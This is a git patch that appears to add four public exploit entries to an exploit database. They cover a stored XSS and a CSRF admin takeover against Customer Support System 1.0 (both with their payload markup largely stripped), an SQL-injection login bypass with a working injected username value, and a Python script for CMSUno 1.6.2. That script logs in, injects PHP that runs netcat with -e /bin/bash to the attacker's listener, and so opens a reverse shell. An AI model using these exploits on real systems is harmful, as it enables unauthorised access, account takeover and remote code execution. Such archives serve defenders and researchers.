From e9fc264b77b82b9101b80bf3926134c351e23b8a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Nov 2020 05:01:58 +0000 Subject: [PATCH] DB: 2020-11-12 4 changes to exploits/shellcodes Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel Customer Support System 1.0 - Cross-Site Request Forgery Customer Support System 1.0 - 'username' Authentication Bypass CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated) --- exploits/php/webapps/49028.txt | 44 ++++++++++++++++++++ exploits/php/webapps/49029.txt | 30 ++++++++++++++ exploits/php/webapps/49030.txt | 30 ++++++++++++++ exploits/php/webapps/49031.txt | 76 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 184 insertions(+) create mode 100644 exploits/php/webapps/49028.txt create mode 100644 exploits/php/webapps/49029.txt create mode 100644 exploits/php/webapps/49030.txt create mode 100644 exploits/php/webapps/49031.txt diff --git a/exploits/php/webapps/49028.txt b/exploits/php/webapps/49028.txt new file mode 100644 index 000000000..d97d9e8ac --- /dev/null +++ b/exploits/php/webapps/49028.txt @@ -0,0 +1,44 @@ +# Exploit Title: Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel +# Date: 2020-11-11 +# Exploit Author: Ahmed Abbas +# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 + + +Stored XSS Reproduction Steps: +1. Navigate to http://TARGET/customer_support/index.php?page=department_list +2. Click on new Department +3. Add the XSS payload into the "description" parameter value +4. Browse to the post to trigger the XSS payload + +# POC + +POST /customer_support/ajax.php?action=save_department HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606 +Content-Length: 445 +Origin: http://localhost +Connection: close +Referer: http://localhost/customer_support/index.php?page=department_list +Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq + +-----------------------------196034062430192961002574272606 +Content-Disposition: form-data; name="id" + +4 +-----------------------------196034062430192961002574272606 +Content-Disposition: form-data; name="name" + +Stored xss +-----------------------------196034062430192961002574272606 +Content-Disposition: form-data; name="description" + + +-----------------------------196034062430192961002574272606-- \ No newline at end of file diff --git a/exploits/php/webapps/49029.txt b/exploits/php/webapps/49029.txt new file mode 100644 index 000000000..6a972498a --- /dev/null +++ b/exploits/php/webapps/49029.txt @@ -0,0 +1,30 @@ +# Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover) +# Date: 2020-11-11 +# Exploit Author: Ahmed Abbas +# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 + + +# Description : Admin Account Takeover +# Vulnerability Details + [+] The username and password parameters can be forged to force the password change of admin user account. + +# POC - CSRF HTML + + + + +
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/49030.txt b/exploits/php/webapps/49030.txt new file mode 100644 index 000000000..11ffbeb05 --- /dev/null +++ b/exploits/php/webapps/49030.txt @@ -0,0 +1,30 @@ +# Title: Customer Support System 1.0 - 'username' Authentication Bypass +# Date: 2020-11-11 +# Exploit Author: Ahmed Abbas +# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 + + +# Description : Authentication Bypass +# Vulnerability Details: +[+] A SQL injection vulnerability in Customer Support System 1.0 allows remote unauthenticated attackers to bypass the authentication process via username and password parameters. + + +# Malicious POST Request to https://TARGET +POST /customer_support/ajax.php?action=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 62 +Origin: http://localhost +Connection: close +Referer: http://localhost/customer_support/login.php +Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo + +username=' or 1=1 or ''='&password=password&type=1 \ No newline at end of file diff --git a/exploits/php/webapps/49031.txt b/exploits/php/webapps/49031.txt new file mode 100644 index 000000000..901ea6c33 --- /dev/null +++ b/exploits/php/webapps/49031.txt @@ -0,0 +1,76 @@ +# Exploit Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated) +# Google Dork: N/A +# Date: 2020.09.30 +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://github.com/boiteasite/cmsuno/ +# Software Link: https://github.com/boiteasite/cmsuno/ +# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html +# Version: 1.6.2 +# Tested on: Kali Linux 2020.2 +# CVE : N/A + +import requests +from bs4 import BeautifulSoup +import lxml +import json +from time import sleep + +username = input("username: ") +password = input("password: ") +root_url = input("Root URL: http://192.168.1.9/cmsuno --> ") +listener_ip = input("Your ip: ") +listener_port = input("Your port for reverse shell: ") + +login_url = root_url + "/uno.php" +vulnerable_url = root_url + "/uno/central.php" + +session = requests.Session() +request = session.get(login_url) + +# Get the unox value +soup = BeautifulSoup(request.text,"lxml") +unox = soup.find("input",{'name':'unox'})['value'] + +# Login + +body = {"unox":unox,"user":username,"pass":password} +session.post(login_url, data=body) + +# Get the second unox value + +request = session.get(login_url) +text = request.text +soup = BeautifulSoup(text,"lxml") +script = soup.findAll('script')[1].string +data = script.split("Unox='")[1] +unox = data.split("',")[0] + +# Exploit + +header = { +"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", +"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0", +"Accept":"*/", +"Accept-Encoding": "gzip, deflate", +"X-Requested-With": "XMLHttpRequest", +"Origin": login_url, +"Referer": login_url +} + +payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port) +body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload) +session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header) + +# Login to trigger password.php + +# Get the unox value +session1 = requests.Session() +request1 = session1.get(login_url) +soup = BeautifulSoup(request1.text,"lxml") +unox = soup.find("input",{'name':'unox'})['value'] + + +# Login +sleep(3) +body = {"unox":unox,"user":username,"pass":password} +session1.post(login_url, data=body) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e51359df6..10d1379ec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40845,6 +40845,10 @@ id,file,description,date,author,type,platform,port 49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php, 49026,exploits/php/webapps/49026.txt,"ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting",2020-11-10,"Joe Helle",webapps,php, 49027,exploits/php/webapps/49027.txt,"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection",2020-11-10,"Mufaddal Masalawala",webapps,php, +49028,exploits/php/webapps/49028.txt,"Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel",2020-11-11,"Ahmed Abbas",webapps,php, +49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php, +49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php, +49031,exploits/php/webapps/49031.txt,"CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)",2020-11-11,"Fatih Çelik",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,